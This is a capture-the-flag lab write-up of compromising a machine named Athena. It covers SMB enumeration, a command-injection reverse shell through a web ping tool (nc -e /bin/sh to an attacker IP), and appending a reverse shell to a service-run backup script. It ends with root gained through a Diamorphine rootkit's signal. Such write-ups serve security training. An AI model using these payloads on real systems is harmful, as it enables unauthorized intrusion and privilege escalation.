# Athena

## Enumeration, SMB & HTTP
Using `nmap`, we discover SSH, HTTP and SMB services.

```
$ enum4linux.pl $IP
...
$ smbclient -U ''%'' //$IP/public
smb: \> ls
  .                                   D        0  Mon Apr 17 02:54:43 2023
  ..                                  D        0  Mon Apr 17 02:54:05 2023
  msg_for_administrator.txt           N      253  Sun Apr 16 20:59:44 2023

		19947120 blocks of size 1024. 9693212 blocks available
smb: \> get msg_for_administrator.txt
...
$ cat msg_for_administrator.txt
...
I would like to inform you that a new Ping system is being developed and I left the corresponding application in a specific path, which can be accessed through the following address: /myrouterpanel
...
```
At address `http://$IP/myrouterpanel/`, we see a "Ping Tool" in which we quickly understand we can inject commands (chars `;`, `&` and `|` seem filtered though). After a few tries, we come up with a working reverse shell:
```
127.0.0.1 -c1 $(nc -e /bin/sh 10.*.*.*** 4242)
```

## `www-data`
On our local machine, we listen (and stabilize):
```
$ nc -lnvp 4242
...
www-data@routerpanel:/var/www/html/myrouterpanel$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@routerpanel:/var/www/html/myrouterpanel$ ls
index.html  ping.php  style.css  under-construction.html
```
Apparently there is not much to do with that user, let us check who could be the interesting user.
```
www-data@routerpanel:/$ cat /etc/passwd
...
athena:x:1001:1001::/home/athena:/bin/bash
...
www-data@routerpanel:/$ find / -user athena 2>/dev/null 
/home/athena
/usr/share/backup
```
And (not so) surprisingly:
```
www-data@routerpanel:/usr/share/backup$ ls -l
total 4
-rwxr-xr-x 1 www-data athena 258 May 28  2023 backup.sh
```
This is a backup script for `athena`, but we own it!.. Investigating further, it is not run through `cron`, but recurrently through a service:
```
www-data@routerpanel:/$ systemctl list-units --type=service --all | grep backup
  athena_backup.service                  loaded    activating auto-restart Backup Athena Notes
www-data@routerpanel:/$ cat /etc/systemd/system/athena_backup.service
[Unit]
Description=Backup Athena Notes

[Service]
User=athena
Group=athena
ExecStart=/bin/bash /usr/share/backup/backup.sh
Restart=always
RestartSec=1min
...
```
Simply append a reverse shell to it:
```
www-data@routerpanel:/usr/share/backup$ echo 'nc -e /bin/sh 10.*.*.*** 4444' >> backup.sh
```

## `athena`
On our local machine, listen, stabilize, get the **user flag**:
```
$ nc -lnvp 4444
...
athena@routerpanel:/$ id
uid=1001(athena) gid=1001(athena) groups=1001(athena)
athena@routerpanel:/$ cat ~/user.txt
**REDACTED**
```
And now for the priv. esc.:
```
athena@routerpanel:/$ sudo -l
...
User athena may run the following commands on routerpanel:
    (root) NOPASSWD: /usr/sbin/insmod /mnt/.../secret/venom.ko
```
So we are allowed to insert a suspicious kernel module:
```
athena@routerpanel:/mnt/.../secret$ sha256sum venom.ko
76c01ef5aaef29e2894beddd8f23726b75f6a8d335499333b60a0e3815de5b2e  venom.ko
```
And indeed [this](https://www.virustotal.com/gui/file/76c01ef5aaef29e2894beddd8f23726b75f6a8d335499333b60a0e3815de5b2e) seems to be a [Diamorphine rootkit](https://github.com/m0nad/Diamorphine) (already seen in HTB _Cyberpsychosis_ challenge). However the default signal `64` to become `root` does not seem to work...

Though we could probably brute-force for the key signal, let us do some proper reverse engineering here. Download the binary:
```
[local]  $ nc -lnp 4343 > venom.ko
[remote] $ nc 10.*.*.*** 4343 < /mnt/.../secret/venom.ko
```
Decompile with Ghidra. In `hacked_kill()` we see that `give_root()` (which acts as expected) is called for signal `57`:
```c
  if (signal == 57) {
    give_root();
    return 0;
  }
```

## `root`
Simply activate the rootkit and get the **root flag**:
```
athena@routerpanel:~$ sudo /usr/sbin/insmod /mnt/.../secret/venom.ko
athena@routerpanel:~$ kill -57 555
athena@routerpanel:~$ id
uid=0(root) gid=0(root) groups=0(root),1001(athena)
athena@routerpanel:~$ cat /root/root.txt
**REDACTED**
```
